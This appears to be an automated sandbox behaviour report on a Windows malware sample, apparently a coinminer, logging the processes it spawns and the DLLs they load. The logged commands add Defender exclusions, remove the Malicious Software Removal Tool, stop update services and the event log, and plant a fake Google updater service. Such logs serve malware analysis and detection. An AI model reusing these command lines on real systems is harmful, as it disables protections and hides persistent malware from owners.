          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: file.exeReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: file.exeStatic file information: File size 5511168 > 1048576
          Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x52a800
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmp
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,64_2_00000001408460F0
          Source: file.exeStatic PE information: section name: .00cfg
          Source: updater.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC62ACDD push rcx; retf 003Fh30_2_00000225DC62ACDE
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC65C6DD push rcx; retf 003Fh30_2_00000225DC65C6DE
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC68ACDD push rcx; retf 003Fh30_2_00000225DC68ACDE
